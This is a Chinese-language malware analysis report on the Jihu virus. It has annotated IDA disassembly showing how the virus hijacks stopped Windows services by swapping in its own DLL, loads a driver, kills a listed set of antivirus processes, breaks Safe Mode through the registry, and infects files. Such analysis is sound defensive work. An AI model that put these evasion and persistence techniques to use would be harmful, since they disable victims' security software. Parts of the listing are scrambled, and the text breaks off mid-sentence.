极虎病毒分析报告

分析的比较仓促，有一部分行为也没有仔细分析，请大家多多指教哈^_^

一、概述

本文档讲述关于极虎病毒变种的行为、技术细节；

该病毒主要通过互联网和局域网传播，其大小为248,832 字节 ，编写语言不详。运行后先判断自身模块位置，如为0x0040000则认为是exe文件，此时打开指定服务，搜索指定的dll文件，找到合适之后将自身修改成dll路径替换之。如果不为0x0040000则认定自身为dll文件然后破坏安全模式，结束杀毒软件，下载木马，感染指定类型的文件，感染可移动磁盘，攻击局域网用户。

二、行为预览

1) 病毒名称：极虎病毒(又名虎虎生威) 2) 病毒类型：感染型病毒 3) 病毒大小：248,832 字节

4) 传播方式：互联网，局域网，可移动存储介质，网页挂马 5) 相关文件：

a 【极虎病毒】分析报告.doc : 病毒分析报告 b 极虎病毒exe.v : 病毒样本；

c 极虎病毒.idb : 病毒IDA打开文件；

6) 病毒具体行为：

a 获取自身模块地址和0x0040000作比较，不同则判断成exe文件运行。此时将自身读入内存并修改成dll属性，然后查找指定的服务，找到其中停止的服务，并查找对应的dll用自身替换之。

b 当为dll被加载时首先搜寻avp.exe,bdagent.exe进程，如果找到则写入一堆nop跳过之后将其删除。在临时文件夹下释放驱动文件加载后删除。获取自身模块对应的服务将其设置成开机启动。

c 利用驱动干扰和结束杀毒软件，分别向驱动发送IRP吗添加劫持和结束杀软。其中被结束的杀软名有：KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccSvcHst.exe.ccSvcHst.exe.ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.

exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.TMBMSRV.exe.SfCtlCom.exe.TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe.

d 删除指定注册表SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal和SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network来破坏安全模式。修改host文件。感染文件，其中感染文件类型如下：exe，asp，aspx，asp，htm，html，rar。对exe文件主要是在添加一个.tc节头，然后在末尾写上一串shell代码，对rar文件则首先解压到临时文件夹内，然后感染之再打包压回。其他文件则在末尾写上一串脚本。感染之前跳过系统路径包括WinRAR，WindowsUpdate，Windows NT，Windows Media Player，Outlook Express，NetMeeting，MSN Gaming Zone，Movie Maker microsoft frontpage，Messenger，Internet Explorer，InstallShield Installation InformationComPlus Applications，Common Files，RECYCLER，System Volume InformationDocuments and Settings，WinNT，WINDOWS。

三、清理方式

由于该病毒破坏安全模式并感染电脑上大部分文件，手动很难清除，故建议采用专杀工具清理。

【以下为正文】

四、正文

.text:00401B7E call $+5

.text:00401B83 mov eax, [esp+2Ch+var_2C] ; 取当前地址 .text:00401B86 mov [ebp+lpAddress], eax .text:00401B89 pop eax

.text:00401B8A push 1Ch ; size_t .text:00401B8C push 0 ; int .text:00401B8E lea eax, [ebp+Buffer]

.text:00401B91 push eax ; void * .text:00401B92 call memset .text:00401B97 add esp, 0Ch

.text:00401B9A push 1Ch ; dwLength .text:00401B9C lea eax, [ebp+Buffer]

.text:00401B9F push eax ; lpBuffer .text:00401BA0 push [ebp+lpAddress] ; lpAddress .text:00401BA3 call ds:VirtualQuery

.text:00401BA9 mov eax, [ebp+Buffer.AllocationBase] .text:00401BAC mov hModule, eax

.text:00401BB1 push 0 ; lpModuleName .text:00401BB3 call ds:GetModuleHandleA

.text:00401BB9 cmp eax, hModule ; 检查当前地址 .text:00401BBF jnz short DllFile ; 当是Dll文件时跳走 .text:00401BC1 push [ebp+arg_C] .text:00401BC4 push [ebp+arg_8] .text:00401BC7 push [ebp+arg_4] .text:00401BCA push [ebp+arg_0]

text:00401BCD call ExeRun .; 当该文件为exe执行 .text:00401BD2 mov [ebp+var_24], eax .text:00401BD5 jmp short loc_401BE8 .text:00401BD7 DllFile: .text:00401BD7 push [ebp+arg_8] .text:00401BDA push [ebp+arg_4] .text:00401BDD push [ebp+arg_0]

.text:00401BE0 call DllRun . ; 当是Dll时执行

当该文件为exe文件时首先创建管道\\\\\\\\.\\\\pipe\\\\96DBA249-E88E-4c47-98DC-E18E6E，如果成功就尝试从管道中读取数据，如果失败则通过判断错误码，如果是所有管道都在使用中则终止程序。实现过程如下：

.text:0040657E push 0 ; hTemplateFile .text:00406580 push 0 ; dwFlagsAndAttributes .text:00406582 push 3 ; dwCreationDisposition .text:00406584 push 0 ; lpSecurityAttributes

.text:00406586 push 0 ; dwShareMode .text:00406588 push 0C0000000h ; dwDesiredAccess .text:0040658D push [ebp+lpFileName] ; lpFileName

.text:00406590 call ds:CreateFileA ; 尝试打开管道\

.text:00406596 mov [ebp+hObject], eax

.text:00406599 cmp [ebp+hObject], 0FFFFFFFFh

.text:0040659D jnz short loc_4065C7 ; 打开成功跳走 .text:0040659F push 1 ; Buffer .text:004065A1 lea eax, [ebp+String2]

.text:004065A7 push eax ; lpBuffer

.text:004065A8 call CreateBin ; 打开成功，创建\文件

.text:004065AD call ds:GetLastError

.text:004065B3 cmp eax, 0E7h ; 错误吗意义：所有的管道范例都在使用中。

.text:004065B8 jnz short Over_0 ; 没有空闲的管道，跳出 .text:004065BA push 0 ; uExitCode

.text:004065BC call ds:ExitProcess ; 管道在使用终止程序

当打开管道成功后跳到这里

=============================================================

.text:004065C7 mov [ebp+Mode], 2 ; 管道模式 .text:004065CE push 0 ; lpCollectDataTimeout .text:004065D0 push 0 ; lpMaxCollectionCount

.text:004065D2 lea eax, [ebp+Mode] ; PIPE_READMODE_MESSAGE .text:004065D5 push eax ; lpMode .text:004065D6 push [ebp+hObject] ; hNamedPipe

.text:004065D9 call ds:SetNamedPipeHandleState ; 设置成读和阻塞模式

.text:004065DF push 0 ; lpOverlapped .text:004065E1 lea eax, [ebp+NumberOfBytesRead]

.text:004065E4 push eax ; lpNumberOfBytesWritten .text:004065E5 push 2 ; nNumberOfBytesToWrite .text:004065E7 push offset byte_40BE6C ; lpBuffer .text:004065EC push [ebp+hObject] ; hFile

.text:004065EF call ds:WriteFile ; 将DD写入管道中 .text:004065F5 push 0 ; lpOverlapped .text:004065F7 lea eax, [ebp+NumberOfBytesRead]

.text:004065FA push eax ; lpNumberOfBytesRead .text:004065FB push 104h ; nNumberOfBytesToRead .text:00406600 push offset String ; lpBuffer .text:00406605 push [ebp+hObject] ; hFile

.text:00406608 call ds:ReadFile ; 从管道中读取数据 .text:0040660E push offset String ; lpString .text:00406613 call ds:lstrlenA .text:00406619 test eax, eax

.text:0040661B jnz short ReadSucceed ; 从该管道读取数据成功 .text:0040661D push [ebp+hObject] ; hObject .text:00406620 call ds:CloseHandle

.text:00406626 push 1 ; Buffer .text:00406628 lea eax, [ebp+String2]

.text:0040662E push eax ; lpBuffer .text:0040662F call CreateBin

.text:00406634 push 0 ; uExitCode

.text:00406636 call ds:ExitProcess ; 管道读取数据失败终止程序

在管道中读取数据成功后则通过strrchr函数搜索以2E开头的ASCII吗字符串，之后反复打开上面管道，知道找不到文件为止，实现方法如下：

.text:0040666C Next: ; CODE XREF: .text:0040666C mov eax, [ebp+var_26C] .text:00406672 inc eax

.text:00406673 mov [ebp+var_26C], eax .text:00406679 loc_406679:

.text:00406679 cmp [ebp+var_26C], 64h .text:00406680 jge short Over_1

.text:00406682 push 0 ; hTemplateFile

.text:00406684 push 0 ; dwFlagsAndAttributes .text:00406686 push 3 ; dwCreationDisposition .text:00406688 push 0 ; lpSecurityAttributes .text:0040668A push 0 ; dwShareMode

.text:0040668C push 0C0000000h ; dwDesiredAccess .text:00406691 push [ebp+lpFileName] ; lpFileName

.text:00406694 call ds:CreateFileA ; 尝试打开\

.text:0040669A mov [ebp+hObject], eax

.text:0040669D cmp [ebp+hObject], 0FFFFFFFFh .text:004066A1 jnz short OpenPipeFail .text:004066A3 call ds:GetLastError

.text:004066A9 cmp eax, 2 ; 错误码：系统找不到指定文件 .text:004066AC jnz short Next_1

.text:004066AE jmp short Over_1 ; 反复打开管道，知道找不到文件后推出

.text:004066B0 Next_1:

.text:004066B0 jmp short GetNext .text:004066B2 OpenPipeFail:

.text:004066B2 push [ebp+hObject] ; hObject .text:004066B5 call ds:CloseHandle .text:004066BB GetNext:

.text:004066BB push 32h ; dwMilliseconds .text:004066BD call ds:Sleep ; 睡眠32h毫秒 .text:004066C3 jmp short Next

然后获取自身文件名完整路径，申请一块堆内存将自身读入内存并修改成dll属性，实现方法如下：

.text:00401C0B push 104h ; nSize .text:00401C10 lea eax, [ebp+FileName]

.text:00401C16 push eax ; lpFilename .text:00401C17 push [ebp+hModule] ; hModule .text:00401C1A call ds:GetModuleFileNameA .text:00401C20 and [ebp+var_120], 0 .text:00401C27 jmp short loc_401C36 .text:00401C29 loc_401C29:

.text:00401C29 mov eax, [ebp+var_120] .text:00401C2F inc eax

.text:00401C30 mov [ebp+var_120], eax .text:00401C36 loc_401C36:

.text:00401C36 cmp [ebp+var_120], 32h .text:00401C3D jge short loc_401C70

.text:00401C3F push 0 ; hTemplateFile .text:00401C41 push 0 ; dwFlagsAndAttributes .text:00401C43 push 3 ; dwCreationDisposition .text:00401C45 push 0 ; lpSecurityAttributes .text:00401C47 push 1 ; dwShareMode .text:00401C49 push 80000000h ; dwDesiredAccess .text:00401C4E lea eax, [ebp+FileName] ; 自身文件路径 .text:00401C54 .text:00401C55 .text:00401C5B .text:00401C5E .text:00401C62 .text:00401C64 .text:00401C66 loc_401C66: .text:00401C66 .text:00401C68 .text:00401C6E .text:00401C70 loc_401C70: .text:00401C70 .text:00401C72 .text:00401C75 .text:00401C7B .text:00401C7E .text:00401C82 .text:00401C84 .text:00401C88 .text:00401C8A loc_401C8A: .text:00401C8A .text:00401C8D .text:00401C93 .text:00401C96 .text:00401C99 .text:00401C9C .text:00401C9F .text:00401CA1 .text:00401CA6 loc_401CA6:

.text:00401CA6 .text:00401CA9 .text:00401CAC .text:00401CAE .text:00401CB1 .text:00401CB4 push eax ; lpFileName

call ds:CreateFileA ; 创建打开自身的文件句柄 mov [ebp+hObject], eax

cmp [ebp+hObject], 0FFFFFFFFh

jz short loc_401C66 ; 打开失败跳走 jmp short loc_401C70

push 64h ; dwMilliseconds call ds:Sleep

jmp short loc_401C29 ; 跳回接着读取自身

push 0 ; lpFileSizeHigh push [ebp+hObject] ; hFile

call ds:GetFileSize ; 打开成功跳到这里获得文件长度 mov [ebp+nNumberOfBytesToRead], eax cmp [ebp+nNumberOfBytesToRead], 0

jz short loc_401C8A ; 文件长度为0跳走关闭句柄退出 cmp [ebp+nNumberOfBytesToRead], 0FFFFFFFFh jnz short loc_401CA6 ; 文件长度合适，跳走准备内存读取

push [ebp+hObject] ; hObject call ds:CloseHandle mov eax, [ebp+arg_4] and dword ptr [eax], 0 mov eax, [ebp+arg_8] and dword ptr [eax], 0 xor eax, eax

jmp locret_401D57 mov eax, [ebp+arg_8]

mov ecx, [ebp+nNumberOfBytesToRead] mov [eax], ecx

mov eax, [ebp+nNumberOfBytesToRead] add eax, 20h

push eax ; unsigned int

.text:00401CB5 call ??2@YAPAXI@Z ; operator new(uint) .text:00401CBA pop ecx

.text:00401CBB mov [ebp+var_124], eax .text:00401CC1 mov eax, [ebp+var_124] .text:00401CC7 mov [ebp+lpBuffer], eax .text:00401CCD mov eax, [ebp+arg_4] .text:00401CD0 mov ecx, [ebp+lpBuffer] .text:00401CD6 mov [eax], ecx

.text:00401CD8 mov eax, [ebp+nNumberOfBytesToRead] .text:00401CDB add eax, 20h

.text:00401CDE push eax ; size_t .text:00401CDF push 0 ; int .text:00401CE1 push [ebp+lpBuffer] ; void *

.text:00401CE7 call memset ; 将申请的内存区域清0 .text:00401CEC add esp, 0Ch

.text:00401CEF push 0 ; lpOverlapped .text:00401CF1 lea eax, [ebp+NumberOfBytesRead]

.text:00401CF4 push eax ; lpNumberOfBytesRead

.text:00401CF5 push [ebp+nNumberOfBytesToRead] ; nNumberOfBytesToRead

.text:00401CF8 push [ebp+lpBuffer] ; lpBuffer .text:00401CFE push [ebp+hObject] ; hFile

.text:00401D01 call ds:ReadFile ; 读取自身到指定的内存中 .text:00401D07 push [ebp+hObject] ; hObject .text:00401D0A call ds:CloseHandle .text:00401D10 and [ebp+var_10], 0 .text:00401D14 mov eax, [ebp+lpBuffer] .text:00401D1A mov ecx, [ebp+lpBuffer]

.text:00401D20 add ecx, [eax+3Ch] ; 取该文件DOS头的最后一个成员变量，使ecx定位到NT头

.text:00401D23 mov [ebp+var_10], ecx .text:00401D26 cmp [ebp+hModule], 0

.text:00401D2A jz short loc_401D41 ; 这里是0代表读取自身 .text:00401D2C mov eax, [ebp+var_10]

.text:00401D2F movzx eax, word ptr [eax+16h]

.text:00401D33 and eax, 0DFFFh .; 修改自身成dll属性

获取临时文件夹路径和系统windows路径，在\中搜索序号为5的函数，如果该dll装载失败则跳走从注册表中读取数据，打开设备管理器循环查看服务，当服务属于停止状态则替换该服务对应的Dll，替换的文件是Dll属性的自身文件，之后跳走退出，不成功则跳回查询下一个。

.text:004020AE push 104h ; uSize .text:004020B3 lea eax, [ebp+Buffer]

.text:004020B9 push eax ; lpBuffer

.text:004020BA call ds:GetWindowsDirectoryA ; 获取windows系统目录

.text:004020C0 push 104h ; size_t .text:004020C5 push 0 ; int .text:004020C7 lea eax, [ebp+TempPath]

.text:004020CD push eax ; void * .text:004020CE call memset .text:004020D3 add esp, 0Ch

.text:004020D6 lea eax, [ebp+TempPath]

.text:004020DC .text:004020DD .text:004020E2 .text:004020E8 .text:004020ED .text:004020EF .text:004020F1 .text:004020F7 .text:004020FA .text:004020FF .text:00402105 .text:0040210B .text:00402112 .text:00402114 .text:00402119 .text:0040211E GetFunAddNo5: .text:0040211E .text:00402120 .text:00402126 .text:0040212C

text:00402141 NextService: .text:00402141 .text:00402147 .text:00402148 .text:0040214E loc_40214E: .text:0040214E .text:00402154 .text:00402156 .text:00402158 .text:0040215E .text:0040215F .text:00402164 .text:00402167 .text:00402169 push eax ; lpBuffer

push 104h ; nBufferLength

call ds:GetTempPathA ; 获取临时文件夹路径 push 0F003Fh ; dwDesiredAccess push 0 ; lpDatabaseName push 0 ; lpMachineName call ds:OpenSCManagerA ; 打开设备管理器 mov [ebp+hSCManager], eax

push offset LibFileName ; \call ds:LoadLibraryA

mov [ebp+hLibModule], eax cmp [ebp+hLibModule], 0

jnz short GetFunAddNo5 ; Dll装载成功跳走 jmp GetVauleReg jmp GetVauleReg

push 5 ; lpProcName push [ebp+hLibModule] ; hModule

call ds:GetProcAddress ; 取得序号为5的函数地址 mov FunNO5sfc_os, eax

mov eax, [ebp+var_B8C] inc eax

mov [ebp+var_B8C], eax

push [ebp+var_B8C] ; int push 0 ; int push 40h ; int lea eax, [ebp+ServiceName]

push eax ; lpString1

call sub_401879 ; 解压服务名称 cmp eax, 0FFFFFFFFh jnz short loc_40218A cmp [ebp+var_784], 0

.text:00402170 jnz short loc_402185 ; ; Dll装载失败跳走 .text:00402172 mov [ebp+var_784], 1

.text:0040217C or [ebp+var_B8C], 0FFFFFFFFh .text:00402183 jmp short NextService .text:00402185 loc_402185:

.text:00402185 jmp GetVauleReg ; ; Dll装载失败跳走 .text:0040218A loc_40218A:

.text:0040218A push [ebp+var_B8C] ; int .text:00402190 push 1 ; int .text:00402192 .text:00402194 .text:0040219A .text:0040219B .text:004021A0 .text:004021A5 .text:004021AB .text:004021AC .text:004021B2 .text:004021B4 .text:004021B6 .text:004021B8 loc_4021B8: .text:004021B8 .text:004021BD .text:004021C3 .text:004021C4 .text:004021C7 .text:004021CD .text:004021D3 .text:004021DA .text:004021DC .text:004021E1 OpenSucceed: .text:004021E1 .text:004021E3 .text:004021E5 .text:004021EB .text:004021EC .text:004021F1 .text:004021F4 .text:004021FA .text:004021FB .text:00402201 .text:00402207 ; SERVICE_STOPPED

.text:0040220E push 40h ; int lea eax, [ebp+String1]

push eax ; lpString1 call sub_401879

push offset String ; lpString2 lea eax, [ebp+String1]

push eax ; lpString1 call ds:lstrcmpiA test eax, eax

jnz short loc_4021B8 jmp short NextService

push 0F01FFh ; dwDesiredAccess lea eax, [ebp+ServiceName]

push eax ; lpServiceName push [ebp+hSCManager] ; hSCManager call ds:OpenServiceA

mov [ebp+hSCObject], eax cmp [ebp+hSCObject], 0

jnz short OpenSucceed ; 打开服务成功跳走 jmp NextService

push 1Ch ; size_t push 0 ; int lea eax, [ebp+ServiceStatus] push eax ; void * call memset add esp, 0Ch

lea eax, [ebp+ServiceStatus]

push eax ; lpServiceStatus push [ebp+hSCObject] ; hService

call ds:QueryServiceStatus ;查看服务状态 cmp [ebp+ServiceStatus.dwCurrentState], 1 jz short ReplaceDll ; 查看服务停止，跳走

.text:00402210 cmp [ebp+var_784], 0

.text:00402217 jnz short ControlThisService

.text:00402219 jmp CloseThisNext ; 跳走关闭该服务并取下一个值 .text:00402223 ControlThisService:

.text:00402223 lea eax, [ebp+ServiceStatus]

.text:00402229 push eax ; lpServiceStatus .text:0040222A push 1 ; dwControl .text:0040222C push [ebp+hSCObject] ; hService

.text:00402232 call ds:ControlService ; 服务没停止则将其停止 .text:00402238 test eax, eax

.text:0040223A jnz short ReplaceDll ; 当服务停止跳走

.text:0040223C jmp CloseThisNext ; 跳走关闭该服务并取下一个值 .text:00402246 ReplaceDll:

.text:00402246 push 104h ; size_t .text:0040224B push 0 ; int .text:0040224D lea eax, [ebp+FileName]

.text:00402253 push eax ; void * .text:00402254 call memset .text:00402259 add esp, 0Ch

.text:0040225C lea eax, [ebp+String1] .text:00402262 push eax

.text:00402263 lea eax, [ebp+Buffer] .text:00402269 push eax

.text:0040226A push offset aSSystem32S_dll ; \.text:0040226F lea eax, [ebp+FileName]

.text:00402275 push eax ; LPSTR

.text:00402276 call ds:wsprintfA ; 设置dll路径，本次调试值为\

.text:0040227C add esp, 10h

.text:0040227F lea eax, [ebp+FileName]

.text:00402285 push eax ; lpFileName

.text:00402286 call ReplaceDll ; 替换dll并将其创建时间设置成原来创建的时间 ; 本次调试值为\.text:0040228B test eax, eax

.text:0040228D jnz short GoStarService

.text:00402291 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值 .text:00402293 GoStarService:

.text:00402293 push 0 ; lpServiceArgVectors .text:00402295 push 0 ; dwNumServiceArgs .text:00402297 push [ebp+hSCObject] ; hService

.text:0040229D call ds:StartServiceA ; 开启原来关闭的服务 .text:004022A3 test eax, eax

.text:004022A5 jnz short ServiceOver ; 重启服务成功跳走

.text:004022A7 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值 .text:004022A9 jmp short CloseThisNext ; 跳走关闭该服务并取下一个值 .text:004022AB ServiceOver:

.text:004022AB push [ebp+hLibModule] ; hLibModule .text:004022B1 call ds:FreeLibrary

.text:004022B7 push [ebp+hSCObject] ; hSCObject .text:004022BD call ds:CloseServiceHandle

.text:004022C3 push [ebp+hSCManager] ; hSCObject .text:004022C6 call ds:CloseServiceHandle .text:004022CC cmp dword_40DC3C, 0

.text:004022D3 jz short ExitThisProcess ; 替换结束服务重启成功跳走终止程序

.text:004022D5 mov eax, dword_40DC3C .text:004022DA mov [ebp+var_C30], eax

.text:004022E0 push [ebp+var_C30] ; void *

.text:004022E6 call ??3@YAXPAX@Z ; operator delete(void *) .text:004022EB pop ecx

.text:004022EC ExitThisProcess:

.text:004022EC push 0 ; uExitCode .text:004022EE call ds:ExitProcess .text:004022F4 CloseThisNext:

.text:004022F4 push [ebp+hSCObject] ; hSCObject .text:004022FA call ds:CloseServiceHandle

.text:00402300 jmp NextService ; 跳回取下一个值

当数据解压失败或者装载Dll失败则从注册表读取数据

.text:00402305 GetVauleReg: ; .text:00402305 push 400h ; size_t .text:0040230A push 0 ; int .text:0040230C lea eax, [ebp+Data]

.text:00402312 push eax ; void * .text:00402313 call memset .text:00402318 add esp, 0Ch

.text:0040231B mov [ebp+cbData], 400h .text:00402322 lea eax, [ebp+hKey]

.text:00402325 push eax ; phkResult .text:00402326 push 1 ; samDesired .text:00402328 push 0 ; ulOptions

.text:0040232A push offset aSoftwareMicros ; \

.text:0040232F push 80000002h ; hKey .text:00402334 call ds:RegOpenKeyExA

.text:0040233A mov dword ptr [ebp+ValueName], 7374656Eh

.text:00402344 mov [ebp+var_77C], 736376h .text:0040234E lea eax, [ebp+cbData]

.text:00402351 push eax ; lpcbData .text:00402352 lea eax, [ebp+Data]

.text:00402358 push eax ; lpData .text:00402359 lea eax, [ebp+Type]

.text:0040235F push eax ; lpType .text:00402360 push 0 ; lpReserved .text:00402362 lea eax, [ebp+ValueName]

.text:00402368 push eax ; lpValueName .text:00402369 push [ebp+hKey] ; hKey

.text:0040236C call ds:RegQueryValueExA ; 从注册表中读取数据 .text:00402372 push [ebp+hKey] ; hKey .text:00402375 call ds:RegCloseKey .text:0040237B lea eax, [ebp+Data]

.text:00402381 mov [ebp+lpString], eax ; 从注册表中读取的数据首地址 .text:00402384 GetNext_1:

.text:00402384 mov eax, [ebp+lpString] .text:00402387 movsx eax, byte ptr [eax] .text:0040238A test eax, eax

.text:0040238C jz over_1 ; 如果从注册表中读取的数据为0则跳走退出 .text:00402392 push offset String ; lpString2 .text:00402397 push [ebp+lpString] ; lpString1 .text:0040239A call ds:lstrcmpiA .text:004023A0 test eax, eax

.text:004023A2 jnz short loc_4023A6 .text:004023A4 jmp short GetNext_1 .text:004023A6 loc_4023A6:

.text:004023A6 push 400h ; size_t .text:004023AB push 0 ; int .text:004023AD lea eax, [ebp+BinaryPathName] .text:004023B3 push eax ; void * .text:004023B4 call memset .text:004023B9 add esp, 0Ch

.text:004023BC push offset aVcs ; \.text:004023C1 push offset aOst_exe ; \.text:004023C6 push offset aSystemrootSyst ; \

.text:004023CB push offset aSS_0 ; \.text:004023D0 lea eax, [ebp+BinaryPathName] .text:004023D6 push eax ; LPSTR

.text:004023D7 call ds:wsprintfA ; \

.text:004023DD add esp, 14h

.text:004023E0 push 0 ; lpPassword .text:004023E2 push 0 ; lpServiceStartName

.text:004023E4 push 0 ; lpDependencies .text:004023E6 push 0 ; lpdwTagId .text:004023E8 push 0 ; lpLoadOrderGroup

.text:004023EA lea eax, [ebp+BinaryPathName] ; \

.text:004023F0 push eax ; lpBinaryPathName .text:004023F1 push 1 ; dwErrorControl .text:004023F3 .text:004023F5 .text:004023F7 .text:004023F9 .text:004023FC .text:004023FF .text:00402402 .text:00402408 .text:0040240E .text:00402415 .text:0040241B .text:0040241E .text:00402424 .text:00402425 .text:0040242A .text:00402430 .text:00402431 .text:00402437 .text:0040243A .text:00402440 .text:00402441 .text:00402444 .text:00402449 .text:0040244F .text:00402450 .text:00402455 .text:00402457 .text:00402459 .text:0040245B .text:0040245D ReadReplace: .text:0040245D .text:0040245F .text:00402461 .text:00402467 .text:0040246D push 2 ; dwStartType push 20h ; dwServiceType push 10h ; dwDesiredAccess push [ebp+lpString] ; lpDisplayName push [ebp+lpString] ; lpServiceName push [ebp+hSCManager] ; hSCManager call ds:CreateServiceA

mov [ebp+hSCObject], eax cmp [ebp+hSCObject], 0 jz Next_2

push [ebp+lpString] lea eax, [ebp+Buffer] push eax

push offset aSSystem32S_dll ; \lea eax, [ebp+FileName]

push eax ; LPSTR call ds:wsprintfA add esp, 10h

lea eax, [ebp+FileName]

push eax ; lpData push [ebp+lpString] ; int

call GetDllName ; 从注册表获取Dll名称 lea eax, [ebp+FileName]

push eax ; lpFileName

call ReplaceDll ; 替换上面提到的Dll test eax, eax

jnz short ReadReplace ; 替换成功跳走启动服务 jmp short Next_2 jmp short Next_2

; CODE XREF: ExeRun+42B j push 0 ; lpServiceArgVectors push 0 ; dwNumServiceArgs push [ebp+hSCObject] ; hService call ds:StartServiceA test eax, eax

.text:0040246F jnz short Over_2 ; 启动你服务成功跳走退出 .text:00402471 jmp short Next_2 .text:00402473 jmp short Next_2 .text:00402475 Over_2:

.text:00402475 push [ebp+hLibModule] ; hLibModule .text:0040247B call ds:FreeLibrary

.text:00402481 push [ebp+hSCObject] ; hSCObject .text:00402487 call ds:CloseServiceHandle

.text:0040248D push [ebp+hSCManager] ; hSCObject .text:00402490 call ds:CloseServiceHandle .text:00402496 cmp dword_40DC3C, 0 .text:0040249D jz short ExitThisProcess_1 .text:0040249F mov eax, dword_40DC3C .text:004024A4 mov [ebp+var_C34], eax

.text:004024AA push [ebp+var_C34] ; void *

.text:004024B0 call ??3@YAXPAX@Z ; operator delete(void *) .text:004024B5 pop ecx .text:004024B6 ExitThisProcess_1:

.text:004024B6 push 0 ; uExitCode .text:004024B8 call ds:ExitProcess .text:004024BE Next_2: ..

.text:004024BE push [ebp+lpString] ; lpString .text:004024C1 call ds:lstrlenA

.text:004024C7 mov ecx, [ebp+lpString] .text:004024CA lea eax, [ecx+eax+1] .text:004024CE mov [ebp+lpString], eax .text:004024D1 jmp GetNext_1

此时该文件为exe的功能就分析结束了，下面是该程序为dll时的功能：首先通过CreateBin函数内部功能判断当前进程名是不是\，如果不是则寻找\和\进程，这里是通过枚举进程名比较，故不贴出来了。 .text:0040540D push offset aAvp_exe ; \.text:00405412 call CheckProcess .text:00405417 test eax, eax

.text:00405419 jnz short GoWriteNop ; 没有找到跳走写入一堆90，然后删除

.text:0040541B push offset aBdagent_exe ; \

.text:00405420 call CheckProcess ; 通过枚举进程搜索这两个杀软进程

.text:00405425 test eax, eax

.text:00405427 jz short GoRevertData

.text:00405429 GoWriteNop: ; CODE XREF: MainGN+7C j .text:00405429 call WriteNop ; 写入一堆90然后删除

接着解压一系列名称如杀软进程名，网络用户名和弱口令，网址名称等，解压完毕后在临时文件夹创建驱动文件\，代码如下：

.text:004054D7 push offset TempPath ; lpBuffer

.text:004054DC push 104h ; nBufferLength .text:004054E1 call ds:GetTempPathA

.text:004054E7 push 104h ; size_t .text:004054EC push 0 ; int

.text:004054EE .text:004054F3 .text:004054F8 .text:004054FB .text:00405500 .text:00405505 .text:0040550B .text:00405510 .text:00405512 .text:00405518 .text:00405519 .text:0040551E .text:00405521 .text:00405526 .text:0040552B .text:00405530 .text:00405536 .text:00405537 .text:0040553A .text:0040553D .text:00405542 .text:00405544 .text:0040554A .text:00405550 .text:00405551 \

.text:00405556 .text:0040555C .text:0040555D .text:00405562 .text:00405567 .text:00405569 .text:0040556F .text:00405570 push offset SystemDirector ; void * call memset add esp, 0Ch

push 104h ; uSize

push offset SystemDirector ; lpBuffer call ds:GetSystemDirectoryA push 104h ; size_t push 0 ; int lea eax, [ebp+FileName]

push eax ; void * call memset add esp, 0Ch

push offset aForter_sys ; \push offset TempPath

push offset aSS_0 ; \lea eax, [ebp+FileName] push eax

call [ebp+wsprintfA] add esp, 10h

push 80h ; int push 65h ; int

push hModule ; hModule lea eax, [ebp+FileName] push eax ; int

call CallLoadResource ; 在临时文件夹下创建lea eax, [ebp+FileName]

push eax ; lpBinaryPathName call StartService_1 ; 启动\服务 push 400h ; size_t push 0 ; int lea eax, [ebp+String]

push eax ; void * call memset

.text:00405575 add esp, 0Ch

.text:00405578 push offset DisplayName ; \

.text:0040557D push off_40B548 ; \

.text:00405583 push offset aSS ; \.text:00405588 lea eax, [ebp+String]

.text:0040558E push eax ; LPSTR .text:0040558F call ds:wsprintfA .text:00405595 add esp, 10h

.text:00405598 lea eax, [ebp+String] .text:0040559E push eax

.text:0040559F push 80000002h

.text:004055A4 call [ebp+SHDeleteKeyA] ; 删除SYSTEM\\\\CurrentControlSet\\\\Services\\\\Forter

.text:004055AA lea eax, [ebp+FileName]

.text:004055B0 push eax ; lpFileName

.text:004055B1 call ds:DeleteFileA ; 删除临时文件夹下的\文件

接下来关闭杀毒软件，杀软进程名：

KVMonXP.kxp.KVSrvXP.exe.avp.exe.avp.exe.avp.exe.RavMonD.exe.RavTask.exe.RsAgent.exe.rsnetsvr.exe.RsTray.exe.ScanFrm.exe.CCenter.exe.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui.exe.ekrn.exe.ccSvcHst.exe.ccSvcHst.exe.ccSvcHst.exe.Mcagent.exe.mcmscsvc.exe.McNASvc.exe.Mcods.exe.McProxy.exe.Mcshield.exe.

mcsysmon.exe.mcvsshld.exe.MpfSrv.exe.McSACore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.avcenter.exe.UfSeAgnt.exe.

TMBMSRV.exe.SfCtlCom.exe.TmProxy.exe.360SoftMgrSvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe.vsserv.exe.MPSVC.exe.MPSVC1.exe.MPSVC2.exe.

MPMon.exe.ast.exe.360speedld.exe.360SoftMgrSvc.exe.360tray.exe.修复工具.exe.

360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxTray.exe. 下面是关闭杀毒软件的步骤：

